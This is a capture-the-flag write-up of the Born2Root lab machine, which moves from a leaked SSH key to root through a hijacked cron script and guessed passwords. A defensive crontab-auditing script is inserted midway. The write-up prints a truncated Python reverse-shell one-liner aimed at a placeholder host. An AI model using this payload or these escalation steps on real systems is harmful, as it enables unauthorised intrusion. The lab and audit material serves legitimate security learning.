BORN2ROOT — Offensive Security

Offensive Security Proving Ground Complete Write-up

I exported the target machine's IP as an environment variable, scanned the target, and found the following open ports and services:

After moving on to port 80, three usernames were found: martin, hadi and jimmy. COOL!!

After busting directories with wfuzz, the results were:

After hopping into the icons directory and enumerating all the files, there was a file containing an SSH key.

AWESOME!! So we have three users; trying martin with the password secret lab gave a successful login.

Enumerating the machine as martin, I found a crontab entry that runs the file sekurity.py from /tmp every five minutes, but the file itself was missing from /tmp.

So I created a file with the same name containing a reverse shell payload:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("0.0.0.0",0000));

with my knife listening on my root machine, and yes, it was good to go!
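The root cause here is a root cron job that executes a script from a world-writable directory, and the script does not even exist, so any local user can plant it. The following checker is an added example written for this write-up, not code from the box or from the original post: it parses system-crontab lines and flags exactly this class of misconfiguration (script under /tmp, /var/tmp or /dev/shm; script missing; script writable by group or others). The crontab lines and the fake filesystem state are constructed; only the /tmp/sekurity.py path comes from the post, and the other paths are hypothetical.

```python
import os
import re
import stat

# Constructed sample crontab lines, modelled on the write-up's finding
# (a root cron job executing a script from /tmp). Not taken from the box.
SAMPLE_CRONTAB = """\
# m h dom mon dow user command
*/5 * * * * root python /tmp/sekurity.py
0 3 * * * root /usr/local/bin/backup.sh
*/10 * * * * root /home/martin/housekeeping.sh
"""

# five schedule fields, the user, then the rest of the line is the command
CRON_RE = re.compile(r"^\s*(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.*)$")

# Directories where any local user can create files; a root cron job that
# executes something from here can be hijacked by whoever creates the file.
WORLD_WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

INTERPRETERS = {"python", "python2", "python3", "sh", "bash", "perl", "ruby"}


def target_script(command):
    """Return the script path a cron command actually runs.
    'python /tmp/x.py' -> '/tmp/x.py'; '/usr/bin/foo -q' -> '/usr/bin/foo'."""
    parts = command.split()
    if not parts:
        return None
    if os.path.basename(parts[0]) in INTERPRETERS and len(parts) > 1:
        return parts[1]
    return parts[0]


def audit_crontab(text, exists=os.path.exists, mode=lambda p: os.stat(p).st_mode):
    """Parse system-crontab lines and return a list of (script, finding) pairs.
    exists/mode are injectable so the check can run against constructed data
    instead of the live filesystem."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = CRON_RE.match(line)
        if not m:
            continue
        user, command = m.group(2), m.group(3)
        script = target_script(command)
        if script is None or not script.startswith("/"):
            findings.append((script, "relative path; depends on cron's cwd/PATH"))
            continue
        if any(script == d or script.startswith(d + "/") for d in WORLD_WRITABLE_DIRS):
            findings.append((script, f"runs as {user} from a world-writable directory"))
        if not exists(script):
            findings.append((script, "script does not exist; first user to create it wins"))
        elif mode(script) & (stat.S_IWGRP | stat.S_IWOTH):
            findings.append((script, "script is group/world writable"))
    return findings


def demo():
    """Run the audit against constructed filesystem state: the /tmp script is
    missing (as in the write-up), the backup script is fine, and the home
    script is world-writable. Returns the list of findings."""
    present = {
        "/usr/local/bin/backup.sh": 0o755,
        "/home/martin/housekeeping.sh": 0o777,
    }
    return audit_crontab(
        SAMPLE_CRONTAB,
        exists=lambda p: p in present,
        mode=lambda p: present[p],
    )


if __name__ == "__main__":
    for script, finding in demo():
        print(f"{script}: {finding}")
```

On a real host you would feed it the contents of /etc/crontab and /etc/cron.d/* with the default exists/mode arguments; the fix for a hit is to move the script to a root-owned directory such as /usr/local/sbin with mode 0755.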

Enumerating the machine turned up nothing special, and the only user left was hadi, so I tried hadi with the obvious password hadi123, and guess what, it worked!!!!

After enumerating the machine, I switched user with the su command, tried the same password, and it was a successful login.

Clearly we are now root!!!

That’s all for now!!

Until Next Time,

Stay COOL!!!!

For any query, catch me on:

https://www.linkedin.com/in/user-neeleshpatel/

Neelesh Patel
Cybersecurity | CTFs | Networking |